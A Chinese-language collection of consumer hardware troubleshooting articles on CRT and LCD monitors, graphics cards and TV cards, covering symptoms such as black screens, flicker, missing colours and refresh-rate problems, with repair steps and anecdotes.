    故障现象一：开机后，绿色电源指示灯亮，无光栅。
    分析与维修：该故障的起因较复杂，通常有以下几种情况：
    1.行扫描电路是否正常。电源指示灯亮，说明直流输出正常。应重点检查行扫描电路。检查发现显像管灯丝无亮点（微暗红色），说明行扫描电路未工作（行扫描电路除提供显像管所需高压外，还提供灯丝电源）。行扫描电路未工作的原因有二：一是行振荡电路是否正常；二是行输出管及其外围电路是否正常。行输出管组件容易损坏的器件主要是阻尼二极管（在线测量时电阻大约为5～10Ω）和电容。用万用表检查前级振荡电路。振荡电路输出电压＋0.4V，测其推动三极管，发现Q401的R401电阻为0，说明三极管Q410已被击穿。更换后，故障排除。
    2.集成块IC410是否正常。先查开关变压器T2的次级整流输出电压是否正常。用万用表仔细检测，发现集成块IC401无脉冲信号输出；再查集成块IC401的供电电压是否正常。采用“假定法”，假定电源供电正常，集成块IC401第17脚应有同步信号输入，但实测IC401第21脚无输出。更换之，故障排除。
    3.高压电路是否正常。因集成块IC401输出触发脉冲经三极管Q401、Q402放大后分成两路，分别触发行扫描回路和高压电路（高压电路由T501、Q502及外围元件组成）。开机，在带电状态下用示波器两只探针靠近三极管Q502，观察是否有行脉冲电压产生。若有行脉冲电压输出，高压电路正常；若无，则高压电路有故障。关机，用万用表的“R×1KΩ”档测三极管Q502的集电极是否存在过载保护。若无，判断系Q502故障所致。更换后，故障排除；若更换后，故障依旧，则应检查与其相连的三极管Q501、Q510、Q511等组成的外围电路是否正常。
    4.供电电路是否正常。供电电路由Q505、L501、D508等组成。当三极管Q505导通时，流经L501的电流线性上升；当Q505截止时，L501中的电流已上升至一定幅度，在L501两端产生脉冲电压，再经D508整流、C516滤波后变成直流电压向T501、Q502供电。更换后故障依旧，则应查驱动管Q504及脉宽调制集成块IC501是否正常。
    故障现象二：开机后，电源指示灯不亮，无显示。
    分析与维修：根据故障现象分析，电源指示灯不亮，说明直流电路异常。测整流桥堆有输出，但压降波动较大。关机，静态下测开关管是否正常，均正常；此类显示器一般均设有过流（或过压）保护装置，当行扫描电路输出异常时，测得电源电压＋110V，从而判断行扫描回路存在“过载”现象；用万用表检测行输出电路，实测发现阻尼二极管已被击穿，形成通路。更换后，故障排除。
    故障现象三：开机后缺绿色。
    分析与维修：显示器缺少某种颜色的可能有以下两种原因：（1）RGB三种信号的输入端缺少某颜色信号，这可能系显示卡的输出信号缺少某颜色，即显卡本身故障；（2）从RGB输入端到显像管之间的三个阴极的通道某个环节上故障。这个通道包括信号处理电路、视频放大电路、保护和显像电路。用示波器仔细检查缺某种颜色的通道电路，即可找出故障点。
    用示波器的两只红、黑表笔分别接入显像管的阴极GK两端测试、GK处无波形，而BK、RK均有波形。再用示波器测试Q314的基极A点处。此点有信号波形，故判断故障出自Q314的基极和GK之间的某个元件。首先怀疑Q314损坏。焊下Q314，静态测量正常；考虑到RV302系碳膜电位器，长时间加热可能变质或烧断。焊下之，用万用表测试发现其两端间已断路。更换后，故障排除。
    故障现象四：开机后无屏显，用手触摸屏幕无高压静电反应。
    分析与维修：根据故障现象，判断系显像管的高压未加上，故应先从高压电路向前逐步检查。因无现成的电路图，可根据印制板电路先用示波器检测Q305的集电极，无波形变化，说明Q305不起振；再向前查Q311、Q310均无波形输出。最后查至集成块LA7851的第（12）脚无波形输出。集成块LA7851的第（12）脚为行振荡输出端，无波形输出说明LA785行振荡输出电路已损坏；但其场振荡仍有输出波形，说明场振荡工作正常。因行振荡回路无输出波形，故行放大、行动驱、高压及行输出部分均不正常。焊下LA785更换后，故障排除。


升级您的电视卡

《一键清理系统垃圾》

升级您的电视卡

《中国电脑教育报》yunyan

    我的这块同维TV2000电视卡购于1999年，随着硬件的升级系统也由Windows 98换成了Windows XP。可惜这块电视卡没有Windows XP下的驱动程序（很多电视卡的驱动程序更新都比较慢），因此只能在机箱里当个摆设。但是不甘心的我经过多次试验，终于找到了在Windows XP下使用电视卡的方法，从而实现了在Windows XP下看电视的“梦想”。

    这个方法其实并不难，只需要将电视卡驱动程序换成丽台Winfast TV2000的即可，另外为了提高录像及播放质量，我也换用了第三方的播放软件。具体做法是：首先到官方网站下载Winfast TV2000的驱动程序并选择人工安装；然后安装第三方软件WinDVR或PowerDVR。启动软件，其设备栏内就会列出你的电视卡，经过简单的设置就可以收看电视节目和进行节目录像了。

    至于其他杂牌的电视卡也可以试着换换驱动程序和播放软件，说不定就能解决您的苦恼。


我被“电视卡”撞了一下腰

《一键清理系统垃圾》

我被“电视卡”撞了一下腰

《中国电脑教育报》魏常生

    现在，各大电脑厂商正在热炒电脑电视。作为DIYer的一员，虽然不能像人家那样不开主机就能看电视，但装个电视卡，享受一下一边看电视一边打字聊天的快乐，总还是可以的吧。于是就到电脑城买了一块电视卡回家。

    将电视卡安装好后开机，Windows 98发现了新硬件，装好驱动程序及软件后重启电脑。然后运行程序，看到桌面上有了控制和电视窗口，只是有点纳闷，怎么电视窗口一片漆黑呀？哦，是忘了搜索信号。几分钟后搜索完毕，保存节目列表，电视的声音从音箱传了出来，可画面还是黑的。心想可能是电台有问题，就把搜到的几十个频道换了一遍，还是只闻其声不见其人。虽然有些郁闷，但想我等高手从286一路追到Pentium 4，多少软硬故障不是手到病除？这点毛病岂能难住老夫。于是按照先软后硬的原则，删除驱动重装故障依旧；把Windows 98升级到Windows Me，直至Windows XP故障还是一样。系统没问题就检查一下电视卡软件的设置，进入设置项把自己认为有关的设置试了一遍还是不行。于是怀疑连线有问题，可抱来电视接上可以正常接收节目……心里有点着急了打电话到商家吧，这时才想起售货员MM要给写个电话，说有事好联系，自己一时逞能就没要，现在悔之晚矣啊！带上电视卡去电脑城？不行不到最后关头不能去，天黑路远不说，万一到那儿一试正常岂不丢了我的面子。于是坐下来冷静分析：信号没问题，卡也是新的，出问题的可能性不大。操作系统似乎也没有问题，那就还只能是设置的事……死马当活马医吧，第N次进入设置，制式、信号源都对。“高级设置”上面是录像、快照的保存路径，下面“使用Overlay显示方式”一项是选中的，因自己英文文不太好，刚才把所有选项都试了，就是没敢动这个，现在已山穷水尽，干脆试试吧。把前面的“√”去掉确定，罗京那熟悉的面孔终于出现在屏幕上，问题解决了！


显卡

《一键清理系统垃圾》

显卡

[color=Red]显卡常见故障一：开机无显示[/color]
[color=Blue]此类故障一般是因为显卡与主板接触不良或主板插槽有问题造成。对于一些集成显卡的主板，如果显存共用主内存，则需注意内存条的位置，一般在第一个内存条插槽上应插有内存条。由于显卡原因造成的开机无显示故障，开机后一般会发出一长两短的蜂鸣声（对于AWARD BIOS显卡而言）。 [/color]

[color=red]常见故障二：显示花屏，看不清字迹 [/color]
[color=Blue此类故障一般是由于显示器或显卡不支持高分辨率而造成的。花屏时可切换启动模式到安全模式，然后再在Windows 98下进入显示设置，在16色状态下点选“应用”、“确定”按钮。重新启动，在Windows 98系统正常模式下删掉显卡驱动程序，重新启动计算机即可。也可不进入安全模式，在纯DOS环境下，编辑
SYSTEM.INI文件，将display.drv=pnpdrver改为display.drv=vga.drv后，存盘退出，再在Windows里更新
驱动程序。
][/color]

[color=Red]常见故障三：颜色显示不正常，此类故障一般有以下原因： [/color]
[color=Blue]1. 显示卡与显示器信号线接触不良
    2. 显示器自身故障
    3. 在某些软件里运行时颜色不正常，一般常见于老式机，在BIOS里有一项校验颜色的选项，将其开启即可
    4. 显卡损坏；
    5. 显示器被磁化，此类现象一般是由于与有磁性能的物体过分接近所致，磁化后还可能会引起显示画面出现偏转的现象。
[/color]

[color=Red]常见故障四：死机[/color]
[color=Blue]出现此类故障一般多见于主板与显卡的不兼容或主板与显卡接触不良；显卡与其它扩展卡不兼容也会造成死机。

常见故障五：屏幕出现异常杂点或图案
此类故障一般是由于显卡的显存出现问题或显卡与主板接触不良造成。需清洁显卡金手指部位或更换显
卡。

常见故障六：显卡驱动程序丢失
显卡驱动程序载入，运行一段时间后驱动程序自动丢失，此类故障一般是由于显卡质量不佳或显卡与主板不兼容，使得显卡温度太高，从而导致系统运行不稳定或出现死机，此时只有更换显卡。

此外，还有一类特殊情况，以前能载入显卡驱动程序，但在显卡驱动程序载入后，进入Windows时出现死机。可更换其它型号的显卡在载入其驱动程序后，插入旧显卡予以解决。如若还不能解决此类故障，则说明注册表故障，对注册表进行恢复或重新安装操作系统即可。


显卡及显示器故障处理技巧

《一键清理系统垃圾》

显卡及显示器故障处理技巧

2004-12-09 10:48:20

    显卡是计算机系统里的重要配件之一，它能将CPU处理后的数据信号“翻译”成显示器能显示的模拟信号，与显示器组成了电脑的显示子系统。正常情况下，显卡故障率并不高，但随着应用增多和性能的提升，显卡故障率也在呈增长趋势。而显示器作为计算机主要的输出设备，其质量的好坏直接关系着使用效果，但对它来说——有些朋友们还比较陌生。下面就它们常见故障的真正“发病”原因和正确的处理办法进行说明，希望对大家有所帮助！

    一、显卡常见故障的处理

    1.显卡驱动未能正常安装

    我们在安装显卡驱动程序时，经常会遇到提示安装失败的麻烦，而且采用不同版本的驱动也无法解决问题，应该怎样正确地安装显卡驱动程序呢？(1)在机器启动的时候，按“Del”键进入BIOS设置，找到“Chipset Features Setup”选项，将里面的“Assign IRQ To VGA”设置为“Enable”，然后保存退出。许多显卡，特别是Matrox的显卡，当此项设置为“Disable”时一般都无法正确安装其驱动。另外，对于ATI显卡，要先将显卡设置为标准VGA显卡后再安装附带驱动。(2)在安装好操作系统以后，一定要安装主板芯片组补丁程序，特别是对于采用VIA芯片组的主板而言，一定要记住安装主板最新的4IN1补丁程序。(3)安装驱动程序：进入“设备管理器”后，右键单击“显示卡”下的显卡名称，然后点击右键菜单中的“属性”。进入显卡属性后点击“驱动程序”标签，选择“更新驱动程序”，然后选择“显示已知设备驱动程序的列表，从中选择特定的驱动程序”，当弹出驱动列表后，选择“从磁盘安装”。接着点击“浏览”按钮，在弹出的查找窗口中找到驱动程序所在的文件夹，按“打开”按钮，最后确定。此时驱动程序列表中出现了许多显示芯片的名称，根据你的显卡类型，选中一款后按“确定”完成安装。如果程序是非WHQL版，则系统会弹出一个警告窗口，不要理睬它，点击“是”继续安装，最后根据系统提示重新启动电脑即可。另外，显卡安装不到位，往往也会引起驱动安装的错误，因此在安装显卡时，一定要注意显卡金手指要完全插入AGP插槽。

    2.电脑启动时黑屏故障

    启动电脑时，如果显示器出现黑屏现象，且机箱喇叭发出一长两短的报警声，则说明很可能是显卡引发的故障。首先要确定一下是否由于显卡接触不良引发的故障：关闭电源，打开机箱，将显卡拔出来，然后用毛笔刷将显卡板卡上的灰尘清理掉，特别是要注意将显卡风扇及散热片上的灰尘处理掉。接着用橡皮擦来回擦拭板卡的“金手指”。完成这一步之后，将显卡重新安装好(一定要将挡板螺丝拧紧)，看故障是否已经解决。另外，针对接触不良的显示卡，比如一些劣质的机箱背后挡板的空档不能和主板AGP插槽对齐，在强行上紧显示卡螺丝以后，过一段时间可能导致显示卡的PCB变形的故障，只要尝试着松开显示卡的螺丝即可。如果使用的主板AGP插槽用料不是很好，AGP槽和显示卡PCB不能紧密接触，你可以使用宽胶带将显示卡挡板固定，如果还觉得不把握就把显示卡两边的机箱都装上，把显示卡的挡板夹在中间。如果你的显示卡金手指遇到了氧化问题，而且使用橡皮清除锈渍显示卡后仍不能正常工作的话，可以使用除锈剂清洗金手指，然后在金手指上轻轻的敷上一层焊锡，以增加金手指的厚度，但一定注意不要让相邻的金手指之间短路。

    如果通过上面的方法不能解决问题的话，则可能是显卡与主板有兼容问题，此时可以另外拿一块显卡插在主板上，如果故障解除，则说明兼容问题存在。当然，用户还可以将该显卡插在另一块主板上，如果也没有故障，则说明这块显卡与原来的主板确实存在兼容问题。对于这种故障，最好的解决办法就是换一块显卡或者主板。还有一种情况值得注意，那就是显卡硬件上出问题了，一般是显示芯片或显存烧毁，建议将显卡拿到别的机器上试一试，若确认是显卡问题就只能更换了。

    3.显示花屏的故障

    显卡花屏是一种比较常见的显示故障，大部分显卡花屏的故障都是由显卡本身引起的。如果开机显示就花屏的话，首先应检查显卡是不是存在散热问题，用手触摸一下显存芯片的温度，看看显卡的风扇是否停转。再有要检查一下主板上的AGP插槽里是否有灰尘，看看显卡的金手指是否被氧化了，然后可根据具体情况把灰尘清除掉，用橡皮擦把金手指的氧化部分擦亮。如果散热的确有问题的话，我们可以采用换个风扇或在显存上加装散热片的方法解决。如果是在玩游戏或做3D时出现花屏的话，就要考虑到是不是由于显卡驱动与程序本身不兼容或驱动存在BUG而造成的了，可以换一个版本的显卡驱动试一试。如果以上方法不能解决问题，可以尝试着刷新显卡的BIOS，去显卡厂商的主页看看有没更新的BIOS下载。但是要注意——同一厂商同一型号的显示卡的BIOS文件往往也是不相同的，所以说刷新BIOS还是有一定风险的。

    还有一种情况，由于显示器或显卡不支持高分辨率往往也会造成显示花屏的故障。遇到这类故障时我们可切换启动模式到安全模式，在Win 98下进入显示设置，在16色状态下点选“应用”、“确定”按钮。重新启动，在Windows 98系统正常模式下删掉显卡驱动程序，然后重新启动计算机即可。当然也可以在纯DOS的环境下，编辑SYSTEM.INI文件，将display.drv=pnpdrver改为display.drv=vga.drv后，存盘退出，再在Windows里更新驱动程序，即解决问题。除此之外，扩显存不当也很容易导致花屏，为了避免麻烦——在扩显存时应使用相同品牌、相同速度的显存。

    二、CRT显示器常见故障

    目前大家最常用的还是CRT显示器，但随着使用时间增加，CRT显示器的内部元件部分参数也会发生变化，导致显示器出现故障，而这些故障很多是可以通过调整显示器内部某些可调元件解决的。不过由于显示器内有高压电源，出现比较严重的异常问题后应及时送专业维修点维修，而不要自己随意处理，以免出现火灾、人身伤害等危险。

    1.显示器出现偏色问题

    显示器出现偏色的现象也是我们常遇到的问题，其产生的原因主要有：显示器靠近磁性物品被磁化；搬动显示器后，使机内偏转线圈发生移位，产生色纯不良；消磁电路损坏等。当然应首先排除显卡及显示信号线的问题，很多时候信号线接触不良将导致显示器出现偏色的问题。

    而大多数情况下很可能是显示器被磁化导致。CRT显示器会被有强磁场的东西所磁化而出现偏色的问题，比如未经磁屏蔽的低音喇叭等，一般较好的显示器自身带有一定的消磁功能，但对于较严重的磁化就有些无能为力了。这时你需要用专门设备进行消磁。消磁器可购买，也可自制。但无论哪种消磁法，朋友们都要注意安全。通电后手握消磁器不断晃动，逐渐靠近荧光屏，对带磁部位可反复进行，然后一边晃动消磁器一边后退到离荧光屏2米左右再关掉电源。每次通电时间不宜过长，如果一次消磁效果不好可反复进行几次。

    如果是由于搬动显示器后造成的偏色问题，我们可打开显示器后盖将偏转线圈恢复到原来的位置，并将偏转线圈螺钉拧紧即可。对于因机内消磁电路损坏引起的色纯不良，可先检查一下热敏消磁电阻是否损坏，将其取下，用手摇如发出“哗哗”的声音，则为热敏电阻已坏。用万用表查其引脚电阻值，如阻值小于8欧或大于50欧则说明消磁电阻内RTC元件已坏，没有办法只能换新了。如消磁电阻阻值正常的话，则应重点检查消磁线圈的引线，插头，插座之间有无松动和接触不良的问题。

    另外，还有一个令人容易忽视的故障原因——屏幕灰尘过多也会导致屏幕显示白色时偏红！此类故障多发生在色温偏暖的显示器中(很多显示器能自行设置色温)，所以说，遇到白色(和相近颜色)偏红故障时您最好是先清洁一下显示屏后再进行其它的检查，如果故障消失——您就可以少走弯路了！当然，某些机型的亮度值设置得过低也会造成这一“故障”的现象。

    2.无法调整刷新频率故障

    在“显示属性”中显示器刷新频率无法调整的问题，恐怕朋友们都曾遇到过吧！其实无法调整显示器刷新频率大多是因为我们没有选择正确的显示器类型或者显卡的驱动程序安装不正确所造成的。显示器类型的选择往往容易被忽视，许多用户将显示器类型设为“SUPER VGA”之类，结果就会造成无法调整显卡的刷新频率的问题。要知道错误的刷新频率参数有可能对显示器产生危害，所以对于系统不能识别的显示器，应一律按照最保守的默认状态进行设置(60Hz)。解决的方法就是在显示属性中选择正确的显示器类型，如果你使用的是Windows不能识别的，可以随便选择一个性能接近的产品替代。如果是驱动程序的原因，用户重新安装驱动程序即可，因为有时突然死机后，显卡的驱动就丢失了。

    再有，显示器的刷新率不要设置的太高，超过其标准刷新率太多，确实会烧坏显示器或缩短其寿命。为此显示器最好安装自己的驱动，不要盲目使用高档显示器的驱动。其次，Windows中“隐藏显示器不支持的刷新率”项也不要去掉，否则会导致用户使用显示器不支持的刷新率。

    3.显示器屏幕抖动故障

    有时候显示器会莫名其妙的抖动起来，而你眼看着屏幕不停的抖动可就不知道是什么原因，是不是很烦人啊！这种状态会造成电脑使用者眼睛的疲劳，久而久之还会给电脑使用者带来眼疾。造成此类故障的原因有以下几个方面：

    (1)劣质电源或电源设备已经老化：往往杂牌电脑电源所使用的元件、用料都是很差的，很容易造成电脑的电路不畅或供电能力跟不上，当系统繁忙时，显示器尤其会出现屏幕抖动的现象。电脑的电源设备开始老化时，也容易造成相同的问题。

    (2)显示器刷新频率设置不正确：把显示器的分辨率和刷新率设置得偏高或过低的话也可能造成此类故障，所以您可把分辨率和刷新率设置成中间值试试(注：长期工作于超频状态会使某些元件老化而出现此故障，而且故障点比较难找)。

    (3)显示卡接触不良：重插显示卡后，故障即可得到解决。

    (4)病毒作怪：有些计算机病毒会扰乱屏幕显示。

    (5)Windows 95/98系统后写缓存引起：如属于这种原因，在控制面板→系统→性能→文件系统→疑难解答中禁用所有驱动器后写式高速缓存，即可解决问题。

    (6)电源滤波电容损坏：打开机箱，如果看到电源滤波电容(电路板上个头最大的电容)顶部鼓起，说明电容已坏。换个电容问题解决。

    (7)音箱与显示器放得太近：有些音箱的磁场效应会干扰显示器的正常工作。

    (8)电源变压器离显示器和机箱太近：许多外设电源变压器(扫描仪、打印机等)工作时会造成较大的电磁干扰，造成屏幕抖动。把电源变压器放在远离机箱和显示器的地方，问题即可解决。

    三、液晶显示器常见故障

    1.出现水波纹和花屏问题

    首先要做的事情就是仔细检查一下电脑周边是否存在电磁干扰源，然后更换一块显卡，或将显示器接到另一台电脑上，确认显卡本身没有问题，再调整一下刷新频率。如果排除以上原因，很可能就是该液晶显示器的质量问题了，比如存在热稳定性不好的问题。出现水波纹是液晶显示器比较常见的质量问题，自己无法解决，建议尽快更换或送修。

    有些液晶显示器在启动时会出现花屏问题，给人的感觉就好像有高频电磁干扰一样，屏幕上的字迹非常模糊且呈锯齿状。这种现象一般是由于显卡上没有数字接口，而通过内部的数字/模拟转换电路与显卡的VGA接口相连接。这种连接形式虽然解决了信号匹配的问题，但它又带来了容易受到干扰而出现失真的问题。究其原因，主要是因为液晶显示器本身的时钟频率很难与输入模拟信号的时钟频率保持百分之百的同步，特别是在模拟同步信号频率不断变化的时候，如果此时液晶显示器的同步电路，或者是与显卡同步信号连接的传输线路出现了短路、接触不良等问题，而不能及时调整跟进以保持必要的同步关系的话，就会出现花屏的问题。

    2.显示分辨率设定不当

    由于液晶显示器的显示原理与CRT显示器完全不同，它是属于一种直接的像素一一对应显示方式。工作在最佳分辨率下的液晶显示器把显卡输出的模拟显示信号通过处理，转换成带具体地址信息(该像素在屏幕上的绝对地址)的显示信号，然后再送入液晶板，直接把显示信号加到相对应的像素上的驱动管上，有些跟内存的寻址和写入类似。所以液晶显示器的屏幕分辨率不能随意设定，而传统的CRT显示器对于所支持的分辨率较有弹性。LCD只能支持所谓的“真实分辨率”，而且只有在真实分辨率下，才能显现最佳影像。当设置为真实分辨率以外的分辨率时，一般通过扩大或缩小屏幕显示范围，显示效果保持不变，超过部分则黑屏处理。比如液晶显示器工作在低分辨率下800×600的时候，如果显示器仍然采用像素一一对应的显示方式的话，那就只能把画面缩小居中利用屏幕中心的那800×600个像素来显示，虽然画面仍然清晰，但是显示区域太小，不仅在感觉上不太舒服而且对于价格昂贵的液晶显示板也是一种极大的浪费。另外也可使用插值等方法，无论在什么分辨率下仍保持全屏显示，但这时显示效果就会大打折扣。此外液晶显示器的刷新率设置与画面质量也有一定的关系。朋友们可根据自己的实际情况设置合适的刷新率，一般情况下还是设置为60Hz最好。

有零工作室　www.you0.com www.you0.net 联系QQ 3149886


显卡刷新频率随你改

《一键清理系统垃圾》

显卡刷新频率随你改

《中国电脑教育报》王彬

    大家都知道，通常显卡的刷新频率是可以更改的。一般刷新频率在75Hz以上时，显示器在视觉上才会无闪烁感。相信许多DIYer都会遇到过显示频率无法更改的情况，即刷新频率只有“默认适配器、正常、优化”三个选项，而且设置为“优化”显示器仍有闪烁感。

    笔者用的是小太阳15英寸显示器和Trident9850显卡，一直不能调节刷新率。由于错误地认为是显卡档次太低所致，所以笔者一直饱受屏幕闪烁之苦，当然视力也下降了0.x度：）。近日，笔者买了一块NVIDIA显卡，速度倒是快了，可令人恼火的是，屏幕闪烁的问题依然存在。将两块显卡拿到朋友的电脑上一试，居然连Trident 9850的显示频率都可以更改。敢情我这把银子花点的有点冤。系统问题？格式化C盘，重装Windows，问题仍旧。不会是我的显示器这么次吧？可手中没有第二台显示器可以试，于是想到一招“瞒天过海”！

    在桌面空白处单击鼠标右键→属性→“设置”标签→“高级”按钮→“监视器”标签→“更改”按钮，将显示器选择为Windows预置的型号。我设置的是IBM P50，大家可以多试几个，找一个指标比较接近的，如果所找类型相差太远有时在运行中会黑屏。设置好显示器类型后，再点选“适配器”标签，看看刷新频率处有什么变化。怎么样？看到了吧，刷新频率是不是有了“60Hz、70Hz、75Hz、80Hz”等项？如果有因显示器闪烁视力下降而就此打住的，不要忘记来个感谢信呀！: )

    叮当点评：这招“瞒天过海”确实是好招。问题的关键还在于显示器品质不高，缺乏即插即用所必需的DDC信息等，导致Windows不能正确地判断显示器所能支持的显示模式。


显示器15针接头受潮导致黑屏

《一键清理系统垃圾》

显示器15针接头受潮导致黑屏

《中国电脑教育报》dong

    一天下午，照旧开机先开显示器，再开主机，却没看到电脑自检的画面，直到响起Windows 98的开机音乐画面都没出来，给我来了个大黑脸。我想了想以前看过的黑屏的文章，造成黑屏的原因不外乎几种：显示器坏、显卡坏了、连接显卡的插头松了、分辨率设置，还有就是系统问题了。一个个排除：显示器买了不到半年，爱国者770FT，大厂产品，品质没问题；我的精英主板内置显卡，也没问题；分辨率设置的是800×600，刷新速度85Hz，显示器指标是绰绰有余；把连接显卡的插头擦了一遍，把上面的灰吹掉，重新插紧，重新开机还是黑屏；能响起开机音乐，这表明系统没问题。到底怎么回事呢？

    我有点灰心了真想打电话叫电脑公司来人修，又怕老爸老妈骂，还是自力更生吧。重新来过，仔细想想，确定还是显示器15针接头有问题。用个牙签包点棉花去擦插头里面，才发现里面有点水渍（我的房间有点潮）。把水渍擦干，又用吹风机吹一下，插好开机，久违的画面又回来了！这是我第一次自己解决硬件问题，希望这次故障给大家一些参考，检查连接插头是一定要仔细，找着那一点小故障就能解决大问题。


显示器OSD菜单的几种特殊故障及处理方法

《一键清理系统垃圾》

显示器OSD菜单的几种特殊故障及处理方法

    数控显示器调整方便，操作简单，迅速取代了原来的模拟调整显示器而迅速占领市场。不过，在我们使用过程中也会出现一些奇怪的与OSD菜单有关的故障，让我们摸不着头脑。现在我就结合实际中遇到的一些故障问题介绍一下这些故障产生的原因和解决方法。

    1.当按下显示器面板上的“MENU”键后，OSD菜单一闪即逝，无法调整相应设置内容。

    这类问题多是因为显示器内部的MCU没有直接焊接在板子上，而使用的是IC座。这种安装方法主要是为了避免PCB板在波峰焊过种中的高温和静电损坏MCU集成电路。但是在长时间使用过程中，MCU的引脚会产生氧化生锈现象，导致MCU引脚与IC座接触不良，最后就出现了这种情况。这种方法解决起来也非常简，只要小心把40脚的MCU集成电路取下来，再用力插回就可以了。

    2.显示器开机OSD菜单一直显现，无法消去。

    这种问题常见于使用时间比较久的显示器，多是三四的显示器。因为显示器OSD菜单的控制按键使用不是矩阵扫描方式，而是电压判断方式。为了避免周围环境中的干扰，在MCU的信号采样端都焊接了一个瓷片电容。瓷片电容在使用几年后或者因为周围环境湿度过大时就会老化漏电，导致MCU的取样电压不准或飘移，也就出现上述的现象，不用按键就会出现OSD菜单，并且无法消除。这种故障排除需要懂些电路，找出MCU按键取样电路中的抗干扰电容，用烙铁把这个电容焊下来就可以了。不用买一个新的焊上去也行。

    3.能够正常调整相应参数，但是关机重新回到原来状态。

    这种情况常出现在使用一年半以上的OSD显示器上。多数都是头一天还好好的，可第二天一开机，却坏了。这里所谓的坏了，就是图像变小了或变得过大，或图像的颜色不正常等等。其中有部分故障可以通过OSD菜单调为正常使用模式，但是只要一关机，再开机时就又恢复到时“坏”的状态。如果是对显示器的OSD菜单设置熟悉的人还可以，只要不怕麻烦的调整就行。不过，有的就不是简单调整就能恢复的，还需要进入工厂模式才能修复。对于这类故障，多是因为显示器内的存储器芯片损坏，不能保存设置所致，型号多为24C04,24C08，更换一个新的就可以解决问题。不过，不能拿一个空白的换上，要不开机后什么也没有，显示器的电源指示灯亮，有高压，但始终黑屏。必须使用编程器把该型号显示器的设置内容（也就是正常机型中的存储器内容）写入空白芯片中，再换上就可以了。

    还有一种特殊的，即使更换存储芯片后，使用一段时间后故障依然出现。这是因为显示器存储器电路中的搞干扰电容损坏换容所致，不能起到搞干扰作用，导致外界干扰脉冲改写了存储器中的内容。这种故障的检查就麻烦了一些，需要有些电子技术才行。

    4.图像偏暗，同时OSD菜单也很暗，无法调整图像的亮度和对比度。

    当显示器图像偏暗时，我们可以通过呼出OSD菜单，来判别是硬件电路故障还是OSD菜单设置有误。如果呼出的OSD菜单同样暗淡不清，这种故障就是显示器内部电路有问题，多是亮度，对比度电路故障，栅极，灯丝，阴极电压不正常所致；如果OSD菜单清晰，那么这种故障就是用户无意中把用户模式中的亮度和对比度设置为最小值所致。如果把OSD菜单用户模式中的亮度和对比度设置为最大值后，图像还不是很亮，那么就有必要进入显示器工厂模式中调整副亮度和副对比度。

    5.当显示器出现缺色时，我们也可以通过OSD菜单来帮助判断故障的部位。

    如果OSD菜单也同样缺色，那故障肯定是显示器的尾板电路，多是CRT驱动电路或预视放电路的集成电路有问题。如果OSD菜单颜色正常，而图像颜色缺色，这种故障一般就是信号线中有断线，信号插头有断针或短针情况。个别的显卡中可以设置显示器输出色温调整，当颜色过于偏向某一色时，也给人的感觉也是显示器缺色。


显示器

《一键清理系统垃圾》

显示器

[color=Red]显示器用的时间长了，各种小毛病就会接踵而来。专家认为，要解决这些小毛病实际上很简单，用一双眼睛就可以看出故障的所在。[/color]
[color=Red]常见故障一：电脑刚开机时显示器的画面抖动得很厉害，有时甚至连图标和文字也看不清，但过一二分钟之后就会恢复正常。 [/color]
[color=Blue]这种现象多发生在潮湿的天气，是显示器内部受潮的缘故。要彻底解决此问题，可使用食品包装中的防潮砂用棉线串起来，然后打开显示器的后盖，将防潮砂挂于显象管管颈尾部靠近管座附近。这样，即使是在潮湿的天气里，也不会再出现以上的“毛病”。
[/color]

[color=Red]常见故障二：电脑开机后，显示器只闻其声不见其画，漆黑一片。要等上几十分钟以后才能出现画面。 [/color]
[color=Blue]这是显象管座漏电所致，须更换管座。拆开后盖可以看到显象管尾的一块小电路板，管座就焊在电路板
上。小心拔下这块电路板，再焊下管座，到电子商店买回一个同样的管座，然后将管座焊回到电路板上。这时不要急于将电路板装回去，要先找一小块砂纸，很小心地将显象管尾后凸出的管脚用砂纸擦拭干净。特别是要注意管脚上的氧化层，如果擦得不干净很快就会旧病复发。将电路板装回去就大功告成。[/color]

[color=Red]常见故障三：显示器屏幕上总有挥之不去的干扰杂波或线条，而且音箱中也有令人讨厌的杂音。 [/color]
[color=Blue]这种现象多半是电源的抗干扰性差所致。如果懒得动手，可以更换一个新的电源。如果有足够的动手能[/color]

[color=Red]常见故障四：显示器花屏。[/color]
[color=Blue]这问题较多是显卡引起的。如果是新换的显卡，则可能是卡的质量不好或不兼容，再有就是还没有安装正确的驱动程序。如果是旧卡而加了显存的话，则有可能是新加进的显存和原来的显存型号参数不一所致。[/color]

[color=Red]常见故障五：显示器黑屏。[/color]
[color=Blue]如果是显卡损坏或显示器断线等原因造成没有信号传送到显示器，则显示器的指示灯会不停地闪烁提示没有接收到信号。要是将分辨率设得太高，超过显示器的最大分辨率也会出现黑屏，重者销毁显示器，但现在的显示器都有保护功能，当分辨率超出设定值时会自动保护。另外，硬件冲突也会引起黑屏。

显示器抖动的原因

显示器刷新频率设置得太低

    当显示器的刷新频率设置低于75Hz时，屏幕常会出现抖动、闪烁的现象，把刷新率适当调高，比如设置成高于85Hz，屏幕抖动的现象一般不会再出现。

电源变压器离显示器和机箱太近

    电源变压器工作时会造成较大的电磁干扰，从而造成屏幕抖动。把电源变压器放在远离机箱和显示器的地方，可以让问题迎刃而解。

劣质电源或电源设备已经老化

    许多杂牌电脑电源所使用的元件做工、用料均很差，易造成电脑的电路不畅或供电能力跟不上，当系统繁忙时，显示器尤其会出现屏幕抖动的现象。电脑的电源设备开始老化时，也容易造成相同的问题。

音箱放得离显示器太近

    音箱的磁场效应会干扰显示器的正常工作，使显示器产生屏幕抖动和串色等磁干扰现象。

病毒作怪

    有些计算机病毒会扰乱屏幕显示，比如：字符倒置、屏幕抖动、图形翻转显示等。网上随处可见的屏幕抖动脚本，就足以让你在中招之后头大如牛。

显示卡接触不良

    重插显示卡后，故障可得到排除。

WIN95/98系统后写缓存引起

    如属于这种原因，在控制面板-系统-性能-文件系统-疑难解答中禁用所有驱动器后写式高速缓存，可让问题得到根本解决。

电源滤波电容损坏

    打开机箱，如果你看到电源滤波电容（电路板上个头最大的那个电容）顶部鼓起，那么便说明电容坏了，屏幕抖动是由电源故障引起的。换了电容之后，即可解决问题。


显示器常见故障解决方法

《一键清理系统垃圾》

显示器常见故障解决方法

   显示器用的时间长了，各种小毛病就会接踵而来。有时要解决这些小毛病办法也较为简单，用一对眼睛就可以看出故障的所在。
   画面抖动
   现象：电脑刚开机时显示器的画面抖动得很厉害，有时甚至连图标和文字也看不清，但过一两分钟之后就会回复正常。
